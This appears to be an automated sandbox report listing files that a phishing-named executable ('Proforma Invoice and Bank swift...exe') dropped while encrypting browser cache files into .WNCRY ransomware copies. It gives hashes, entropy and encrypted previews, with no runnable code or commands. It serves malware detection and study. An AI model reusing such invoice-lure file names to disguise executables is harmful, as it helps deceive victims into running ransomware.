                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\09QWLN0Z\th[1].svg.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1944
                                                          Entropy (8bit):7.901525039374476
                                                          Encrypted:false
                                                          SSDEEP:48:bk0JcQJFNtpMJDkGyjvxNxqH8ESs/5h3d:o0SyHpM6/fwBhN
                                                          MD5:0A958A61D903B522F66433124E4659A4
                                                          SHA1:2F0836DA6261907094B80329874873B273A4B678
                                                          SHA-256:3C2A1B57F99C4CD58B1817EA189D34879B3759C5585C7733251006D3EE3D44CC
                                                          SHA-512:DA3F8AC9A49C7293F273A200CA921845A4D9518B8C91B57BF0B955DEDF0F4DCA45733F21A60FCD5BFA80BCC7A727A9F6D3B7BAB60882C9EB6ECF80AC7D254E1B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....C....3/...WQ.."6...e.=.R.f.nm.].|._....y.'..Lb>.B....%`. ..}....u...f..S.%^..e.e.Z(.2...B...3..hj...W.P\.+KDI.'....im..r(.9;Y.k.....;.Oi...D^$...EG0oE^.#..h.....5<...J..&.....K...........J....%..]>.?...$J..cy4K6.[3...o...^...6.w..0.!....v.......IO.s........V..l...2.D.2r.D.._......!JF..=.e."1*.lN.....FA.l.WK...X...~.@.xV...:L..._]r............7U...@5.b....j......D....fCz.A....6..K.E.Zd..:x.7."..K...aW$..Z1.....-.7F...Ue..l......|S.r..Tv3]....."|.._.R.=O0.R.n...;..6%..663..1....w..'..65V...(.....#Hu+}>.@....1...]..:.K9..!UJ7..]m[.....X.....+kzY.r.{...o-..yZ..J..u.fkv.i.L.+.[..RU"f....a....G^g.c....?..^.\'... .z.BP.c.9.:`.../...5.(4bl.....|..H|.....?..^T...U"..Y......p%C....br........O5.S.H....4..(}.b............:.S8{.?..q'.{.S...)..t.....yq.E..i.Y..s|v.......n..>;Zm.r...-Y..O..f+..*...../.....z..?<d.g.o...).V.....<...Q........M.....jA...a...X.Z9..WT7.#\...6.Y.O.[z.G.&..?....W.t..]}.:Z.?.rUrD...$.......P..7O....}j.X...J.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\09QWLN0Z\th[1].svg.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1944
                                                          Entropy (8bit):7.901525039374476
                                                          Encrypted:false
                                                          SSDEEP:48:bk0JcQJFNtpMJDkGyjvxNxqH8ESs/5h3d:o0SyHpM6/fwBhN
                                                          MD5:0A958A61D903B522F66433124E4659A4
                                                          SHA1:2F0836DA6261907094B80329874873B273A4B678
                                                          SHA-256:3C2A1B57F99C4CD58B1817EA189D34879B3759C5585C7733251006D3EE3D44CC
                                                          SHA-512:DA3F8AC9A49C7293F273A200CA921845A4D9518B8C91B57BF0B955DEDF0F4DCA45733F21A60FCD5BFA80BCC7A727A9F6D3B7BAB60882C9EB6ECF80AC7D254E1B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....C....3/...WQ.."6...e.=.R.f.nm.].|._....y.'..Lb>.B....%`. ..}....u...f..S.%^..e.e.Z(.2...B...3..hj...W.P\.+KDI.'....im..r(.9;Y.k.....;.Oi...D^$...EG0oE^.#..h.....5<...J..&.....K...........J....%..]>.?...$J..cy4K6.[3...o...^...6.w..0.!....v.......IO.s........V..l...2.D.2r.D.._......!JF..=.e."1*.lN.....FA.l.WK...X...~.@.xV...:L..._]r............7U...@5.b....j......D....fCz.A....6..K.E.Zd..:x.7."..K...aW$..Z1.....-.7F...Ue..l......|S.r..Tv3]....."|.._.R.=O0.R.n...;..6%..663..1....w..'..65V...(.....#Hu+}>.@....1...]..:.K9..!UJ7..]m[.....X.....+kzY.r.{...o-..yZ..J..u.fkv.i.L.+.[..RU"f....a....G^g.c....?..^.\'... .z.BP.c.9.:`.../...5.(4bl.....|..H|.....?..^T...U"..Y......p%C....br........O5.S.H....4..(}.b............:.S8{.?..q'.{.S...)..t.....yq.E..i.Y..s|v.......n..>;Zm.r...-Y..O..f+..*...../.....z..?<d.g.o...).V.....<...Q........M.....jA...a...X.Z9..WT7.#\...6.Y.O.[z.G.&..?....W.t..]}.:Z.?.rUrD...$.......P..7O....}j.X...J.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\09QWLN0Z\th[2].png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):18968
                                                          Entropy (8bit):7.990885407876004
                                                          Encrypted:true
                                                          SSDEEP:384:alxPAR0TvaDYRbKWywENIa3eO1d5um4MyNn0r6ynimdJT4F3jDMN7AAMEC5lu:al5ARuvaDK5oSa3bqMYMimX+c56vu
                                                          MD5:AD90740B515F1F7A333D96447EFD8EA7
                                                          SHA1:515902C47588F82C2C67ED7B0C5E4EF81CBFF3AD
                                                          SHA-256:2A43E8BE439832E9C1933BF5024E9266C8EAE01EA1EB812D7A05A62FDFDFECF8
                                                          SHA-512:B824CA737999394739B0D3734E33C6D1AB74CC95F64FFB2EC5C52AC3D1B56C54599F5CFECBCA9BCBAA3E7FA652F71B96D2C80ADA12F9720618EB13956C2D26D4
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....<...n..i...8/...`.mH..t"..c..S_|....k..%{JDd..c./.j...'..|....8h.n@...gJh.....m.&.....Rh-...^<..S......l.........).%..%^..H..+...]Z...Y...*K..5.....U. .(..U;>......)..34....|S.#.....5....ch..X.E...eN..E.tzQ0...1..~}.%...^...#X[q..].cV..B....6....a.....H.......<m.L..1/...k0.........{...5<0j.c.s...\O5.t.lR.+7.J.z..m{B8..^S4..n$.Zm.J..(..........~V)..nhB..:#..Vr..BC.r.7.}E.2I.E.t.7.^..V..\.....(...h...{..X.m%~..p.....x..R.)e.3..3.7W..b\.......r.j2'\n...W...X\W...2........R.i...Uq ...k.nL...fK..L.R...)K.^=...?..i...*.)E.P.-..X/@..../.M0?...(..4G..k~....^.mp.e,OMglG...q.m....Ox...)O..:d....p.p.....q.....V...L^"..p....jF...'=.=.~...g.6..q.[|.9..6..d..".........Yh..u....vi.)....Fh...}.....$......x.B.....E.9..5C.v...;M...(.;.\a..p..=...d!?....T.6..bUK......p..:..h0.>. ....N.1..:k>.u.p:.1...<."...Z.,-.l.8..b../..%}......X.o;.&..d.BXF.\.g-....f...n)........cr...(.8.3"...>......WNI.......u....E.V...bU6..nWx.+.". /*....Il.....N...5..>.'..XT

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\09QWLN0Z\th[2].png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):18968
                                                          Entropy (8bit):7.990885407876004
                                                          Encrypted:true
                                                          SSDEEP:384:alxPAR0TvaDYRbKWywENIa3eO1d5um4MyNn0r6ynimdJT4F3jDMN7AAMEC5lu:al5ARuvaDK5oSa3bqMYMimX+c56vu
                                                          MD5:AD90740B515F1F7A333D96447EFD8EA7
                                                          SHA1:515902C47588F82C2C67ED7B0C5E4EF81CBFF3AD
                                                          SHA-256:2A43E8BE439832E9C1933BF5024E9266C8EAE01EA1EB812D7A05A62FDFDFECF8
                                                          SHA-512:B824CA737999394739B0D3734E33C6D1AB74CC95F64FFB2EC5C52AC3D1B56C54599F5CFECBCA9BCBAA3E7FA652F71B96D2C80ADA12F9720618EB13956C2D26D4
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....<...n..i...8/...`.mH..t"..c..S_|....k..%{JDd..c./.j...'..|....8h.n@...gJh.....m.&.....Rh-...^<..S......l.........).%..%^..H..+...]Z...Y...*K..5.....U. .(..U;>......)..34....|S.#.....5....ch..X.E...eN..E.tzQ0...1..~}.%...^...#X[q..].cV..B....6....a.....H.......<m.L..1/...k0.........{...5<0j.c.s...\O5.t.lR.+7.J.z..m{B8..^S4..n$.Zm.J..(..........~V)..nhB..:#..Vr..BC.r.7.}E.2I.E.t.7.^..V..\.....(...h...{..X.m%~..p.....x..R.)e.3..3.7W..b\.......r.j2'\n...W...X\W...2........R.i...Uq ...k.nL...fK..L.R...)K.^=...?..i...*.)E.P.-..X/@..../.M0?...(..4G..k~....^.mp.e,OMglG...q.m....Ox...)O..:d....p.p.....q.....V...L^"..p....jF...'=.=.~...g.6..q.[|.9..6..d..".........Yh..u....vi.)....Fh...}.....$......x.B.....E.9..5C.v...;M...(.;.\a..p..=...d!?....T.6..bUK......p..:..h0.>. ....N.1..:k>.u.p:.1...<."...Z.,-.l.8..b../..%}......X.o;.&..d.BXF.\.g-....f...n)........cr...(.8.3"...>......WNI.......u....E.V...bU6..nWx.+.". /*....Il.....N...5..>.'..XT

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\09QWLN0Z\trans[1].gif.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.194538372505552
                                                          Encrypted:false
                                                          SSDEEP:6:bkEbBkZ2EjZ2spWzbFybtTuT+ZbcHOD0pQGERG3ysmTSAv1o2HcjBCV:bkEbBk/jZ3pWzbghZbN0pQGmG3yblvKW
                                                          MD5:5EFAA57DA8BBCBACF2A206E88DCFD7EB
                                                          SHA1:54E6707FE5387B9C78BE9F76FA317AD4BC3E116A
                                                          SHA-256:6D70C9C353FD64CB51601A92B33A3BD269586A3E8682078A408D7C560B3522FF
                                                          SHA-512:CDD4DD769F5175BF8A012E4E8AABFACA7E78DEB3D943E3FA49A520FC7953709B1FE9CAB382E4E48309FCAB255D115E7446E891F95DB22B4BDCD14FF25D97558A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....G....~-|...`.........-.[.Vb.....7..9..].{.Iq..H..J..R!..........%..?...:.....>..$\..^i..%L.079.+...V.v>..H>.R7...c.7....\.L).@...o....C++..+vk........u...D...].R..;Ah5...$...#|7.n....k..\...KP|5..!.w..=......'T2...<..q.=W.{O.m.....t.:..,....+.......L.........cQ.....3.'.8.q...J..a..[.U.s..3.5.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\09QWLN0Z\trans[1].gif.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.194538372505552
                                                          Encrypted:false
                                                          SSDEEP:6:bkEbBkZ2EjZ2spWzbFybtTuT+ZbcHOD0pQGERG3ysmTSAv1o2HcjBCV:bkEbBk/jZ3pWzbghZbN0pQGmG3yblvKW
                                                          MD5:5EFAA57DA8BBCBACF2A206E88DCFD7EB
                                                          SHA1:54E6707FE5387B9C78BE9F76FA317AD4BC3E116A
                                                          SHA-256:6D70C9C353FD64CB51601A92B33A3BD269586A3E8682078A408D7C560B3522FF
                                                          SHA-512:CDD4DD769F5175BF8A012E4E8AABFACA7E78DEB3D943E3FA49A520FC7953709B1FE9CAB382E4E48309FCAB255D115E7446E891F95DB22B4BDCD14FF25D97558A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....G....~-|...`.........-.[.Vb.....7..9..].{.Iq..H..J..R!..........%..?...:.....>..$\..^i..%L.079.+...V.v>..H>.R7...c.7....\.L).@...o....C++..+vk........u...D...].R..;Ah5...$...#|7.n....k..\...KP|5..!.w..=......'T2...<..q.=W.{O.m.....t.:..,....+.......L.........cQ.....3.'.8.q...J..a..[.U.s..3.5.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\09QWLN0Z\trans[2].gif.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.241362294567419
                                                          Encrypted:false
                                                          SSDEEP:6:bkEh1BJpF6+w7O2bXHzfMDsUOAyJOL8vR0te6i8DNwRtqNJ7jYyGuiN:bkEXBzElK2bXHz04AOOL8qe38LGuiN
                                                          MD5:E4EEB691BC759C123F50102BF24DA44F
                                                          SHA1:1E8CD73A38E58E7E23F826798CE3AAC750346335
                                                          SHA-256:C5A1D1F5F1B627DF32598D5F15EADAC2E4F4D74442536F44FEB85728BF18B5A1
                                                          SHA-512:6C6AC2AA3FA6D983E9F21FD547CA31393374D0CE1C2D22B4B9292F3BB98BEA06605B54C4878FCA2DE3ADE38104E3E303B1DCE845297EF6F27FC21406ED480270
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........;....k.(Q>..Y...!.....:.!aW...U../.......+...V.\..u.t......S.MW..xv..m..F.e..E.`..:.SM..P.l.....c.l...!K$D.......r@...y.M..!K.gB..T...qk%g....h..!Tt...O.\...o.....u.]Q|.\N.Y..&.g...W..^_.R4..W.+.....$.0....K:.&..r#....i..........j...........+...........~R..+....M>.w2g..:)..0....mds.V...zY%-.1q...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\09QWLN0Z\trans[2].gif.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.241362294567419
                                                          Encrypted:false
                                                          SSDEEP:6:bkEh1BJpF6+w7O2bXHzfMDsUOAyJOL8vR0te6i8DNwRtqNJ7jYyGuiN:bkEXBzElK2bXHz04AOOL8qe38LGuiN
                                                          MD5:E4EEB691BC759C123F50102BF24DA44F
                                                          SHA1:1E8CD73A38E58E7E23F826798CE3AAC750346335
                                                          SHA-256:C5A1D1F5F1B627DF32598D5F15EADAC2E4F4D74442536F44FEB85728BF18B5A1
                                                          SHA-512:6C6AC2AA3FA6D983E9F21FD547CA31393374D0CE1C2D22B4B9292F3BB98BEA06605B54C4878FCA2DE3ADE38104E3E303B1DCE845297EF6F27FC21406ED480270
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........;....k.(Q>..Y...!.....:.!aW...U../.......+...V.\..u.t......S.MW..xv..m..F.e..E.`..:.SM..P.l.....c.l...!K$D.......r@...y.M..!K.gB..T...qk%g....h..!Tt...O.\...o.....u.]Q|.\N.Y..&.g...W..^_.R4..W.+.....$.0....K:.&..r#....i..........j...........+...........~R..+....M>.w2g..:)..0....mds.V...zY%-.1q...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\09QWLN0Z\trans[3].gif.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.178970851132325
                                                          Encrypted:false
                                                          SSDEEP:6:bkE6OF1mEHYaA7ZLfflkOD02udIgqU5q8QeIcUXsm7XKvd7iWe:bkE6CG7ZLV1uV5UeI3sms7Ze
                                                          MD5:74D4A420BED6A710AF18B63EF073A711
                                                          SHA1:8DD3E8E4DE847171977B2D3458B2887F756A3ACC
                                                          SHA-256:C16C06CAC55DEC5E7394E7C2B0D0633035585168F07090D86C47B53B4199A2A4
                                                          SHA-512:033623999E8DD085E9305FBAC043E32AD284104793EA53F050B4BF3B311B2761429A4F6D47D2B39A64A7458D6BEFD842ECF34738C4868122B953658FA7C288E1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......I.l..b.bQ.\.4g..B...!.R.d.g2OP?l.)..5.1...Ja.}D.S..v,gw..Nt9.....;....k.....,X$.:.l....o.y....|....T^..........AZ.i.....>.R.).!.w..mnTD)]?.dZ1./=?2....M~.QT....l....Q.(..Y.+..1...!.#.!.%x.zhJ{.........0.y....]A..R.]b)z.b.H.zI..OC{.........Kn....+........Ti.1..9..e;G.u.g.6S|.QK.\.A...E......Y..)W.9

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\09QWLN0Z\trans[3].gif.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.178970851132325
                                                          Encrypted:false
                                                          SSDEEP:6:bkE6OF1mEHYaA7ZLfflkOD02udIgqU5q8QeIcUXsm7XKvd7iWe:bkE6CG7ZLV1uV5UeI3sms7Ze
                                                          MD5:74D4A420BED6A710AF18B63EF073A711
                                                          SHA1:8DD3E8E4DE847171977B2D3458B2887F756A3ACC
                                                          SHA-256:C16C06CAC55DEC5E7394E7C2B0D0633035585168F07090D86C47B53B4199A2A4
                                                          SHA-512:033623999E8DD085E9305FBAC043E32AD284104793EA53F050B4BF3B311B2761429A4F6D47D2B39A64A7458D6BEFD842ECF34738C4868122B953658FA7C288E1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......I.l..b.bQ.\.4g..B...!.R.d.g2OP?l.)..5.1...Ja.}D.S..v,gw..Nt9.....;....k.....,X$.:.l....o.y....|....T^..........AZ.i.....>.R.).!.w..mnTD)]?.dZ1./=?2....M~.QT....l....Q.(..Y.+..1...!.#.!.%x.zhJ{.........0.y....]A..R.]b)z.b.H.zI..OC{.........Kn....+........Ti.1..9..e;G.u.g.6S|.QK.\.A...E......Y..)W.9

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\09QWLN0Z\trans[4].gif.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.203519648526362
                                                          Encrypted:false
                                                          SSDEEP:6:bkELlk4AdDyL6mLd/wd9w6ux9IMBprmWocF135eoh0OY7HvSIg+Pn:bkELSNdDyWOThOM/mWo01JnoHvS8n
                                                          MD5:9C8F50BFC6461CC49B94C727BBCE9C5D
                                                          SHA1:86775BB3F80F8226097D21837BB94518E48FDC90
                                                          SHA-256:07FB8420865E5620B3A747946050F7931C000E9F58D8A6466E4AF3D58FA17C7B
                                                          SHA-512:E662E5FB5FF4CE7EA8B22B0F7B07F1AC03E32AD50AE737C04F569D63A4E274574809CB4DE317E8F4CEAE8337B81CCD6AD9378AEFAA17857993B722527CBC85FF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....j.v.i.5..Q....b.4.e..\?P-..5.7...c....%.\.{..nY.ZV.d........!4.k...[...an...j.u.,~ya1....{e.....7....M....oC.E~c...K......%....[).......A..O.l......_.J..)..\..L...t.O....Zk.Q.g..d.q...`*.y#lj.W.g...O..InTL.\.b......`D...pm....(....Y..e.$A,p...u9....+...........R...q.$..H.x.,.m._...l.OE.cM.e:<.O..+..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\09QWLN0Z\trans[4].gif.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.203519648526362
                                                          Encrypted:false
                                                          SSDEEP:6:bkELlk4AdDyL6mLd/wd9w6ux9IMBprmWocF135eoh0OY7HvSIg+Pn:bkELSNdDyWOThOM/mWo01JnoHvS8n
                                                          MD5:9C8F50BFC6461CC49B94C727BBCE9C5D
                                                          SHA1:86775BB3F80F8226097D21837BB94518E48FDC90
                                                          SHA-256:07FB8420865E5620B3A747946050F7931C000E9F58D8A6466E4AF3D58FA17C7B
                                                          SHA-512:E662E5FB5FF4CE7EA8B22B0F7B07F1AC03E32AD50AE737C04F569D63A4E274574809CB4DE317E8F4CEAE8337B81CCD6AD9378AEFAA17857993B722527CBC85FF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....j.v.i.5..Q....b.4.e..\?P-..5.7...c....%.\.{..nY.ZV.d........!4.k...[...an...j.u.,~ya1....{e.....7....M....oC.E~c...K......%....[).......A..O.l......_.J..)..\..L...t.O....Zk.Q.g..d.q...`*.y#lj.W.g...O..InTL.\.b......`D...pm....(....Y..e.$A,p...u9....+...........R...q.$..H.x.,.m._...l.OE.cM.e:<.O..+..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\6hU_LneafI_NFLeDvM367ebFaKQ[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):22136
                                                          Entropy (8bit):7.990371588378893
                                                          Encrypted:true
                                                          SSDEEP:384:tYyhZU2VlxnlrxfRnqnf4rmdffE6icpx9yBLwn/FuLeBN/jSDRFkdO175BXAe:3MAjlBRo4YPpxwBLw/FuLeBljMTV5Bz
                                                          MD5:018B4D42B05C29200D3C2DA3C662B26B
                                                          SHA1:E13E8C27E9C9C19B2445A6614E7D9789AF3581A6
                                                          SHA-256:75C814F2C5DE827C8B8173EEA96871D36EBA0EF6DB55C0968847C24351B3FB83
                                                          SHA-512:2EB1396D7D7F328BCE8EB62268E25E988022CE8F28ECC799732C0E60C4F7E214647DF91B4DB44DC3D756A53BE298CDAAE5ABC329E0D55661BF45474A8AACE5E9
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....V.Zt....&...qU..BI.c.........o..i.WB.......q....y.g....i.....i3...<.8P.N..N..2........6..Q...<R....S\.q...F..h..c0ln....;......4.2.....L...e.x..Y.8.l../. 8.*.&.~.,4......O..ba...4~/^./...y).k.TC....B..8.h...x|2.s..../.X.y.:$ga..i.......B.....YU...........6=.......j d.A..Y.;...ZU..(.x.~.q.,.M.....;.!g->v4..4..c.......`..J%Y.H.c.M.$q.tRL.#..Ig+i....T.pR..."wV.,.9.Z.$.C.......+.dd..f`.^z...&J|..).1^....+...>..?....6.~..N....(.....R.........>..).C.[.-.... F.!N]q..7Q2-..N.;........N...Nco..2?...q..>.......>4.y..W.?..c......J.w..4f|d.......t...@.E....'W....)7Ds.f.@.......V.........0..x...>.3..hf.....ND.`.*....<.......,F..f.4.oy..\..+..Ji..v........`.D.e...QW|...L..%.*....^.M...>T.L.i...N.....:...S.i.N.`f.._.z.a...{6..I.rB.....k.d.....JjeGq.yq...w"0.0..@../..>....@..Ag...|N...<qq...a.c...>...H5..#..... ^..^.I^.....q.1T5k...Q9$.7<`r..9sl._w=...N.......J..b...ym:h\..(.\...d.w....C.d`..X..B.h".).....;N...'.o.I.T.. .U$.)rF...,.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\6hU_LneafI_NFLeDvM367ebFaKQ[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):22136
                                                          Entropy (8bit):7.990371588378893
                                                          Encrypted:true
                                                          SSDEEP:384:tYyhZU2VlxnlrxfRnqnf4rmdffE6icpx9yBLwn/FuLeBN/jSDRFkdO175BXAe:3MAjlBRo4YPpxwBLw/FuLeBljMTV5Bz
                                                          MD5:018B4D42B05C29200D3C2DA3C662B26B
                                                          SHA1:E13E8C27E9C9C19B2445A6614E7D9789AF3581A6
                                                          SHA-256:75C814F2C5DE827C8B8173EEA96871D36EBA0EF6DB55C0968847C24351B3FB83
                                                          SHA-512:2EB1396D7D7F328BCE8EB62268E25E988022CE8F28ECC799732C0E60C4F7E214647DF91B4DB44DC3D756A53BE298CDAAE5ABC329E0D55661BF45474A8AACE5E9
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....V.Zt....&...qU..BI.c.........o..i.WB.......q....y.g....i.....i3...<.8P.N..N..2........6..Q...<R....S\.q...F..h..c0ln....;......4.2.....L...e.x..Y.8.l../. 8.*.&.~.,4......O..ba...4~/^./...y).k.TC....B..8.h...x|2.s..../.X.y.:$ga..i.......B.....YU...........6=.......j d.A..Y.;...ZU..(.x.~.q.,.M.....;.!g->v4..4..c.......`..J%Y.H.c.M.$q.tRL.#..Ig+i....T.pR..."wV.,.9.Z.$.C.......+.dd..f`.^z...&J|..).1^....+...>..?....6.~..N....(.....R.........>..).C.[.-.... F.!N]q..7Q2-..N.;........N...Nco..2?...q..>.......>4.y..W.?..c......J.w..4f|d.......t...@.E....'W....)7Ds.f.@.......V.........0..x...>.3..hf.....ND.`.*....<.......,F..f.4.oy..\..+..Ji..v........`.D.e...QW|...L..%.*....^.M...>T.L.i...N.....:...S.i.N.`f.._.z.a...{6..I.rB.....k.d.....JjeGq.yq...w"0.0..@../..>....@..Ag...|N...<qq...a.c...>...H5..#..... ^..^.I^.....q.1T5k...Q9$.7<`r..9sl._w=...N.......J..b...ym:h\..(.\...d.w....C.d`..X..B.h".).....;N...'.o.I.T.. .U$.)rF...,.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\th[1].png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):11720
                                                          Entropy (8bit):7.986291667950619
                                                          Encrypted:false
                                                          SSDEEP:192:TnKQLMosJOUtiUeXVGNm8QyqQBvYNbWOcA0i9mLHSLV5abBpMCjxvFk0r6sgPEpM:TnKQLMoqud4Nf5iUTQ/abBCcvFk5sguM
                                                          MD5:B28169C8A09A5C0AA8EE1409DA5D4341
                                                          SHA1:651A0347ABEC9E9F193EA92B67CF9560C3916475
                                                          SHA-256:7AD4D3729DC234508EE3B8246C857A8A12CDEAAB7491D42276910E8C282FCD3A
                                                          SHA-512:C7E63954AEC79120C90215F8C234F55E8F681AF051E2F3A09F4C084575A430C88B918EFF8342180C94C0B2755B593256877BDCCF6E4FD427EA2F623E7629C9D6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....hW.;....^...zw.T.........._......!BO..R(~....+Lv.@#y.v..f...........@..y<.F.F]O..Y..%..x.....9......W....Wir.......A..G*.Gz..;+.........n.!....1..XH...eR.m.?t.Y.J..9.fk...bfYI.....m..uH.&.....c.a..+seZf. c.....g<.M..%.......uc..39./".WU?..`..M. .....,......{..|)B..28@..-....]..J..=.\(....B.(...q.....N......e..^..&......:.B.....!.E..0D..M..XMbv}/..X.....g*R.......&>B.....t...vnqZ'.!.0x.....qO...`t...U..Sc..7BT...#r%.Kc...G........pF:.8 ..R,......YEBe.8..l8.....4|.L..S.^].t.;.^..j-E}0T.2...Z.y.__.X..1.+..../.........*+:......1.T_~<.._E.D..U.i.q......G.3esP.C.5..B)..}....8p|K]..=.-...E!)...v..I..}.......u.v^.....G...1...z8.A..b.~.D....v...f.tlw.%-.Q*.*.#g...W..QL.....2...].<R.<....J..-)+..]..8.Mo,n.AT.!d.ap?dd.o....R..p...z.L.1WMd.....N.S..,.3`..0V..m..d....cX.......,-.{.tV.........'$ m.i.8s..{.{*WK3....[<2)rH..0.rF+....r.O...........NG.cb.U?....W.+2.~DpN`&......=.W.y|4...F.. ../.0.^kT..h.B....k.....q{....$R,......V.3.Q.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\th[1].png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):11720
                                                          Entropy (8bit):7.986291667950619
                                                          Encrypted:false
                                                          SSDEEP:192:TnKQLMosJOUtiUeXVGNm8QyqQBvYNbWOcA0i9mLHSLV5abBpMCjxvFk0r6sgPEpM:TnKQLMoqud4Nf5iUTQ/abBCcvFk5sguM
                                                          MD5:B28169C8A09A5C0AA8EE1409DA5D4341
                                                          SHA1:651A0347ABEC9E9F193EA92B67CF9560C3916475
                                                          SHA-256:7AD4D3729DC234508EE3B8246C857A8A12CDEAAB7491D42276910E8C282FCD3A
                                                          SHA-512:C7E63954AEC79120C90215F8C234F55E8F681AF051E2F3A09F4C084575A430C88B918EFF8342180C94C0B2755B593256877BDCCF6E4FD427EA2F623E7629C9D6
                                                          Malicious:false
                                                          Reputation:unknown
